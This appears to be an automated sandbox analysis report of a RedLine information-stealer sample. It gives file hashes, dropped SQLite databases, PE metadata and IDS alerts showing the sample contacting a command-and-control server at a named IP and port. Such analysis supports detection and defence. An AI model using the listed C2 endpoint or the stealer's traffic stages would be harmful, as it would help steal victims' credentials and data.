                                                                      Malicious:false
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):40960
                                                                      Entropy (8bit):0.8553638852307782
                                                                      Encrypted:false
                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):51200
                                                                      Entropy (8bit):0.8746135976761988
                                                                      Encrypted:false
                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.701188456968639
                                                                      Encrypted:false
                                                                      SSDEEP:24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
                                                                      MD5:18A3248DC9C539CCD2C8419D200F1C4D
                                                                      SHA1:3B2CEE87F3426C4A08959E9861D274663420215C
                                                                      SHA-256:27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
                                                                      SHA-512:F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
                                                                      Malicious:false
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.698193102830694
                                                                      Encrypted:false
                                                                      SSDEEP:24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
                                                                      MD5:78472D7E4F5450A7EA86F47D75E55F39
                                                                      SHA1:D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
                                                                      SHA-256:2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
                                                                      SHA-512:D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
                                                                      Malicious:false
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.702263764575455
                                                                      Encrypted:false
                                                                      SSDEEP:24:QUkKzRRr64jMMhcqBDi9yWJqsBFhli3VZ6i0:QUkCe4j/hI9yWJnvi3Vf0
                                                                      MD5:1680F18135FD9FE517865D4B70BCA69F
                                                                      SHA1:CE72CFB81AB690709C2C5BBF40348F829C87813B
                                                                      SHA-256:0F4384BA6CC62588912ACEBE97E6E00A03D1145AFAF38BDE22023CA303B22CA0
                                                                      SHA-512:E63A46F382399DE9A52F82325302CCFF8184246D4A126EDCC98283B6CBC77D4330A01A704BA4E29144A2A37D6E06F9AF22383A00ACC2394E827DC97748171585
                                                                      Malicious:false
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):40960
                                                                      Entropy (8bit):0.8553638852307782
                                                                      Encrypted:false
                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                      Malicious:false
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):98304
                                                                      Entropy (8bit):0.08235737944063153
                                                                      Encrypted:false
                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                      Malicious:false
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):40960
                                                                      Entropy (8bit):0.8553638852307782
                                                                      Encrypted:false
                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                      Malicious:false
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):98304
                                                                      Entropy (8bit):0.08235737944063153
                                                                      Encrypted:false
                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\13P2mxLaQk.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):592896
                                                                      Entropy (8bit):7.594989783475602
                                                                      Encrypted:false
                                                                      SSDEEP:12288:6LLWTG4mVR6vCQy5LSjWur/4cRt4WXjzFcMwipq:gCTg6vCQyh+Wur/lRDDE
                                                                      MD5:B47604CCFF9C611EAF0AA3D7443827B7
                                                                      SHA1:C09A5BE24CD42BBD7605D0B40351D5134CF782A5
                                                                      SHA-256:77F30441445CEB75C76EFF7BFB97F24849BC6155EFB298F69A795933BF2F5E9A
                                                                      SHA-512:2CF63CB9161F519FDBBF3E896206FE9D4ABB216A15B65D0E81875684658E0A6DD498CF936522A8F99B44AD4EA3498E42E82B93E25B32A64FE770ED9F96281AEF
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 58%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f..............0.............R.... ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text...X.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\13P2mxLaQk.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:true
                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.594989783475602
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                      File name:13P2mxLaQk.exe
                                                                      File size:592'896 bytes
                                                                      MD5:b47604ccff9c611eaf0aa3d7443827b7
                                                                      SHA1:c09a5be24cd42bbd7605d0b40351d5134cf782a5
                                                                      SHA256:77f30441445ceb75c76eff7bfb97f24849bc6155efb298f69a795933bf2f5e9a
                                                                      SHA512:2cf63cb9161f519fdbbf3e896206fe9d4abb216a15b65d0e81875684658e0a6dd498cf936522a8f99b44ad4ea3498e42e82b93e25b32a64fe770ed9f96281aef
                                                                      SSDEEP:12288:6LLWTG4mVR6vCQy5LSjWur/4cRt4WXjzFcMwipq:gCTg6vCQyh+Wur/lRDDE
                                                                      TLSH:A1C4E0382549C80BC6951A340DB1F1B846EC6EEDB802EB4B9FDC6EEF757370309651A6
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0.............R.... ... ....@.. .......................`............@................................
                                                                      Icon Hash:62ceac86b2968ea2
                                                                      Entrypoint:0x490c52
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x66FCBAE9 [Wed Oct 2 03:15:53 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x90c00 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x92000 | 0x1208 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x94000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x8ec58 | 0x8f000 | 350e78c8f507a2aa3a04c7a73e6ac88f | False | 0.8563514122596154 | data | 7.614575434550098 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x92000 | 0x1208 | 0x1400 | 8bde6757dfdb02882b9efd1df4b8e9a5 | False | 0.288671875 | data | 4.77077397966687 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x94000 | 0xc | 0x400 | 8fcfdb32a18fbc8f67595007052f7d6c | False | 0.025390625 | data | 0.04468700625387198 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x92118 | 0xda8 | Device independent bitmap graphic, 26 x 64 x 32, image size 3328 | | | 0.2823226544622426
RT_GROUP_ICON | 0x92ec0 | 0x14 | data | | | 1.1
RT_GROUP_ICON | 0x92ed4 | 0x14 | data | | | 1.05
RT_VERSION | 0x92ee8 | 0x320 | data | | | 0.44875

DLL | Import
mscoree.dll | _CorExeMain

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-07T11:29:19.382523+0200 | 2849662 | ETPRO MALWARE RedLine - CheckConnect Request | 1 | 192.168.2.8 | 49707 | 45.88.88.45 | 34221 | TCP
2024-10-07T11:29:22.371423+0200 | 2849662 | ETPRO MALWARE RedLine - CheckConnect Request | 1 | 192.168.2.8 | 49710 | 45.88.88.45 | 34221 | TCP
2024-10-07T11:29:24.542021+0200 | 2045000 | ET MALWARE RedLine Stealer - CheckConnect Response | 1 | 45.88.88.45 | 34221 | 192.168.2.8 | 49707 | TCP
2024-10-07T11:29:24.941101+0200 | 2849351 | ETPRO MALWARE RedLine - EnvironmentSettings Request | 1 | 192.168.2.8 | 49707 | 45.88.88.45 | 34221 | TCP
2024-10-07T11:29:27.354396+0200 | 2045000 | ET MALWARE RedLine Stealer - CheckConnect Response | 1 | 45.88.88.45 | 34221 | 192.168.2.8 | 49710 | TCP
2024-10-07T11:29:27.589571+0200 | 2849351 | ETPRO MALWARE RedLine - EnvironmentSettings Request | 1 | 192.168.2.8 | 49710 | 45.88.88.45 | 34221 | TCP
2024-10-07T11:29:27.905794+0200 | 2045001 | ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound | 1 | 45.88.88.45 | 34221 | 192.168.2.8 | 49707 | TCP
2024-10-07T11:29:27.905794+0200 | 2046056 | ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) | 1 | 45.88.88.45 | 34221 | 192.168.2.8 | 49707 | TCP
2024-10-07T11:29:28.316654+0200 | 2849352 | ETPRO MALWARE RedLine - SetEnvironment Request | 1 | 192.168.2.8 | 49713 | 45.88.88.45 | 34221 | TCP
2024-10-07T11:29:29.923744+0200 | 2848200 | ETPRO MALWARE RedLine - GetUpdates Request | 1 | 192.168.2.8 | 49714 | 45.88.88.45 | 34221 | TCP
2024-10-07T11:29:31.060058+0200 | 2045001 | ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound | 1 | 45.88.88.45 | 34221 | 192.168.2.8 | 49710 | TCP
2024-10-07T11:29:31.060058+0200 | 2046056 | ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) | 1 | 45.88.88.45 | 34221 | 192.168.2.8 | 49710 | TCP
2024-10-07T11:29:31.119839+0200 | 2849352 | ETPRO MALWARE RedLine - SetEnvironment Request | 1 | 192.168.2.8 | 49716 | 45.88.88.45 | 34221 | TCP
2024-10-07T11:29:32.939960+0200 | 2848200 | ETPRO MALWARE RedLine - GetUpdates Request | 1 | 192.168.2.8 | 49721 | 45.88.88.45 | 34221 | TCP

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                      Oct 7, 2024 11:29:28.356368065 CEST342214971345.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:28.356369019 CEST4971334221192.168.2.845.88.88.45
                                                                      Oct 7, 2024 11:29:28.356378078 CEST342214971345.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:28.356393099 CEST342214971345.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:28.356394053 CEST4971334221192.168.2.845.88.88.45
                                                                      Oct 7, 2024 11:29:28.356503010 CEST342214971345.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:28.356509924 CEST342214971345.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:28.356539965 CEST4971334221192.168.2.845.88.88.45
                                                                      Oct 7, 2024 11:29:28.356551886 CEST342214971345.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:28.356558084 CEST342214971345.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:28.356566906 CEST342214971345.88.88.45192.168.2.8
